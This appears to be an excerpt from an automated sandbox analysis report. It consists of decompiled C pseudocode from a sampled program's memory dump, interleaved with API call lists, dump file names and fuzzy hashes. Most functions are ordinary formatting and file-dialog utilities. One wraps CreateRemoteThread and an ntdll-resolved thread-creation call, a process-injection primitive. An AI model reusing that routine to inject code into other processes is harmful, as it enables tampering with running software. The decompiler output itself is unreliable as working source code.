                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                                                                                                                                                          							_t53 = _v20;
                                                                                                                                                                                                                          							__eflags = _t53;
                                                                                                                                                                                                                          							if(_t53 == 0) {
                                                                                                                                                                                                                          								_t53 = 0x40c4e8;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
                                                                                                                                                                                                                          							_t75 = 0;
                                                                                                                                                                                                                          							__eflags = 0;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_t62 = wcschr(_t79, 0x22);
                                                                                                                                                                                                                          							_pop(_t70);
                                                                                                                                                                                                                          							if(_t62 != 0) {
                                                                                                                                                                                                                          								goto L8;
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								E00407343(_t66, _a4, _t79);
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
                                                                                                                                                                                                                          							E00407343(_t66, _a4, ",");
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                          					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return E00407343(_t66, _a4, L"\r\n");
                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 004073A4
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 004073B2
                                                                                                                                                                                                                            • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                                                                                                                                            • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                          • API String ID: 1983396471-123907689
                                                                                                                                                                                                                          • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                                                                                                                          • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                                          			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                          				char* _v20;
                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                          				char* _v36;
                                                                                                                                                                                                                          				signed int _v40;
                                                                                                                                                                                                                          				void _v44;
                                                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                                          				struct _OSVERSIONINFOW _v328;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                                          				intOrPtr* _t44;
                                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                                          				struct HINSTANCE__** _t54;
                                                                                                                                                                                                                          				signed int _t55;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t54 = __eax;
                                                                                                                                                                                                                          				_v328.dwOSVersionInfoSize = 0x114;
                                                                                                                                                                                                                          				GetVersionExW( &_v328);
                                                                                                                                                                                                                          				if(_v328.dwMajorVersion < 6) {
                                                                                                                                                                                                                          					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				E0040A1EF(_t54);
                                                                                                                                                                                                                          				_t44 =  *((intOrPtr*)(_t54 + 4));
                                                                                                                                                                                                                          				if(_t44 != 0) {
                                                                                                                                                                                                                          					_t55 = 8;
                                                                                                                                                                                                                          					memset( &_v44, 0, _t55 << 2);
                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                          					asm("stosd");
                                                                                                                                                                                                                          					_v36 =  &_v12;
                                                                                                                                                                                                                          					_v20 =  &_v52;
                                                                                                                                                                                                                          					_v48 = 0x24;
                                                                                                                                                                                                                          					_v44 = 0x10003;
                                                                                                                                                                                                                          					_v40 = _t55;
                                                                                                                                                                                                                          					_v28 = 0x10004;
                                                                                                                                                                                                                          					_v24 = 4;
                                                                                                                                                                                                                          					_a16 = 0;
                                                                                                                                                                                                                          					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
                                                                                                                                                                                                                          					asm("sbb eax, eax");
                                                                                                                                                                                                                          					return  !( ~_t40) & _a16;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetVersionExW.KERNEL32(?,73B768A0,00000000), ref: 0040A290
                                                                                                                                                                                                                          • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                                                                                                                                            • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                                                                                                                            • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                          • API String ID: 283512611-3993045852
                                                                                                                                                                                                                          • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                                                                                                                          • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                                                          			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                                                          				signed short _v65616;
                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                          				intOrPtr _t28;
                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                                          				intOrPtr* _t51;
                                                                                                                                                                                                                          				void* _t52;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t51 = __esi;
                                                                                                                                                                                                                          				E0040B550(0x1004c, __ecx);
                                                                                                                                                                                                                          				_t39 = 0;
                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                          				_push( &_v8);
                                                                                                                                                                                                                          				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
                                                                                                                                                                                                                          				_push(L"Lines");
                                                                                                                                                                                                                          				_t27 =  *((intOrPtr*)( *__esi))();
                                                                                                                                                                                                                          				if(_v8 > 0) {
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						_t6 = _t39 + 1; // 0x1
                                                                                                                                                                                                                          						_t28 = _t6;
                                                                                                                                                                                                                          						_push(_t28);
                                                                                                                                                                                                                          						_push(L"Line%d");
                                                                                                                                                                                                                          						_v12 = _t28;
                                                                                                                                                                                                                          						_push(0x1f);
                                                                                                                                                                                                                          						_push( &_v80);
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						_t52 = _t52 + 0x10;
                                                                                                                                                                                                                          						_push(0x7fff);
                                                                                                                                                                                                                          						_push(0x40c4e8);
                                                                                                                                                                                                                          						if( *((intOrPtr*)(_t51 + 4)) == 0) {
                                                                                                                                                                                                                          							_v65616 = _v65616 & 0x00000000;
                                                                                                                                                                                                                          							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
                                                                                                                                                                                                                          							_t34 = E004054DF(_a4, _t51,  &_v65616);
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t39 = _v12;
                                                                                                                                                                                                                          					} while (_t39 < _v8);
                                                                                                                                                                                                                          					return _t34;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t27;
                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintf
                                                                                                                                                                                                                          • String ID: Line%d$Lines
                                                                                                                                                                                                                          • API String ID: 3988819677-2790224864
                                                                                                                                                                                                                          • Opcode ID: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                                                                                                                                                          • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                                          			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                          				void* _v26;
                                                                                                                                                                                                                          				void _v28;
                                                                                                                                                                                                                          				void* _t24;
                                                                                                                                                                                                                          				void* _t25;
                                                                                                                                                                                                                          				void* _t35;
                                                                                                                                                                                                                          				signed int _t38;
                                                                                                                                                                                                                          				signed int _t42;
                                                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t24 = _a12;
                                                                                                                                                                                                                          				_t45 = _t44 - 0x18;
                                                                                                                                                                                                                          				_t42 = 0;
                                                                                                                                                                                                                          				 *_t24 = 0;
                                                                                                                                                                                                                          				if(_a8 <= 0) {
                                                                                                                                                                                                                          					_t25 = 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t38 = 0;
                                                                                                                                                                                                                          					_t35 = 0;
                                                                                                                                                                                                                          					if(_a8 > 0) {
                                                                                                                                                                                                                          						_v8 = _t24;
                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                          							_v28 = _v28 & 0x00000000;
                                                                                                                                                                                                                          							asm("stosd");
                                                                                                                                                                                                                          							asm("stosd");
                                                                                                                                                                                                                          							asm("stosd");
                                                                                                                                                                                                                          							asm("stosd");
                                                                                                                                                                                                                          							asm("stosw");
                                                                                                                                                                                                                          							_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                                                                                                                                          							_push(L"%2.2X ");
                                                                                                                                                                                                                          							_push(0xa);
                                                                                                                                                                                                                          							_push( &_v28);
                                                                                                                                                                                                                          							L0040B1EC();
                                                                                                                                                                                                                          							_t38 = _t42;
                                                                                                                                                                                                                          							memcpy(_v8,  &_v28, 6);
                                                                                                                                                                                                                          							_t13 = _t42 + 3; // 0x3
                                                                                                                                                                                                                          							_t45 = _t45 + 0x1c;
                                                                                                                                                                                                                          							if(_t13 >= 0x2000) {
                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							_v8 = _v8 + 6;
                                                                                                                                                                                                                          							_t35 = _t35 + 1;
                                                                                                                                                                                                                          							_t42 = _t42 + 3;
                                                                                                                                                                                                                          							if(_t35 < _a8) {
                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t24 = _a12;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
                                                                                                                                                                                                                          					_t25 = 1;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t25;
                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfmemcpy
                                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                                          • API String ID: 2789212964-323797159
                                                                                                                                                                                                                          • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                                                                                                                          • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 43%
                                                                                                                                                                                                                          			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                          				intOrPtr _t22;
                                                                                                                                                                                                                          				signed int _t30;
                                                                                                                                                                                                                          				signed int _t34;
                                                                                                                                                                                                                          				void* _t35;
                                                                                                                                                                                                                          				void* _t36;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t35 = __esi;
                                                                                                                                                                                                                          				_t34 = 0;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
                                                                                                                                                                                                                          						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
                                                                                                                                                                                                                          						_push( &_v44);
                                                                                                                                                                                                                          						_push(0x2000);
                                                                                                                                                                                                                          						_push( *((intOrPtr*)(__esi + 0x60)));
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						_t36 = _t36 + 0x24;
                                                                                                                                                                                                                          						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
                                                                                                                                                                                                                          						_t34 = _t34 + 1;
                                                                                                                                                                                                                          					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return E00407343(_t35, _a4, L"\r\n");
                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintf
                                                                                                                                                                                                                          • String ID: %%-%d.%ds
                                                                                                                                                                                                                          • API String ID: 3988819677-2008345750
                                                                                                                                                                                                                          • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                                                                                                                          • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                                          				wchar_t* _v52;
                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                          				intOrPtr _v76;
                                                                                                                                                                                                                          				struct tagOFNA _v80;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v76 = __eax;
                                                                                                                                                                                                                          				_v68 = _a4;
                                                                                                                                                                                                                          				_v64 = 0;
                                                                                                                                                                                                                          				_v44 = 0;
                                                                                                                                                                                                                          				_v36 = 0;
                                                                                                                                                                                                                          				_v32 = _a8;
                                                                                                                                                                                                                          				_v20 = _a12;
                                                                                                                                                                                                                          				_v80 = 0x4c;
                                                                                                                                                                                                                          				_v56 = 1;
                                                                                                                                                                                                                          				_v52 = __esi;
                                                                                                                                                                                                                          				_v48 = 0x104;
                                                                                                                                                                                                                          				_v28 = 0x81804;
                                                                                                                                                                                                                          				if(GetOpenFileNameW( &_v80) == 0) {
                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					wcscpy(__esi, _v52);
                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileNameOpenwcscpy
                                                                                                                                                                                                                          • String ID: L
                                                                                                                                                                                                                          • API String ID: 3246554996-2909332022
                                                                                                                                                                                                                          • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                                                                                                                          • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                                                          			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t10;
                                                                                                                                                                                                                          				void* _t12;
                                                                                                                                                                                                                          				struct HINSTANCE__** _t13;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t13 = __eax;
                                                                                                                                                                                                                          				_t12 = 0;
                                                                                                                                                                                                                          				if(E00408F72(__eax) != 0) {
                                                                                                                                                                                                                          					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
                                                                                                                                                                                                                          					if(_t10 != 0) {
                                                                                                                                                                                                                          						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t12;
                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                                                          • String ID: LookupAccountSidW$Y@
                                                                                                                                                                                                                          • API String ID: 190572456-2352570548
                                                                                                                                                                                                                          • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                                                                                                                          • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                          			E0040AD85(intOrPtr _a4) {
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t3;
                                                                                                                                                                                                                          				void* _t7;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t8;
                                                                                                                                                                                                                          				char** _t9;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t7 = 0;
                                                                                                                                                                                                                          				_t8 = E00405436(L"shlwapi.dll");
                                                                                                                                                                                                                          				 *_t9 = "SHAutoComplete";
                                                                                                                                                                                                                          				_t3 = GetProcAddress(_t8, ??);
                                                                                                                                                                                                                          				if(_t3 != 0) {
                                                                                                                                                                                                                          					_t7 =  *_t3(_a4, 0x10000001);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				FreeLibrary(_t8);
                                                                                                                                                                                                                          				return _t7;
                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                                                                                                                                          • String ID: shlwapi.dll
                                                                                                                                                                                                                          • API String ID: 4092907564-3792422438
                                                                                                                                                                                                                          • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                                                                                                                          • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00406597(wchar_t* __esi) {
                                                                                                                                                                                                                          				wchar_t* _t2;
                                                                                                                                                                                                                          				wchar_t* _t6;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t6 = __esi;
                                                                                                                                                                                                                          				E00404AD9(__esi);
                                                                                                                                                                                                                          				_t2 = wcsrchr(__esi, 0x2e);
                                                                                                                                                                                                                          				if(_t2 != 0) {
                                                                                                                                                                                                                          					 *_t2 =  *_t2 & 0x00000000;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return wcscat(_t6, L"_lng.ini");
                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                          APIs
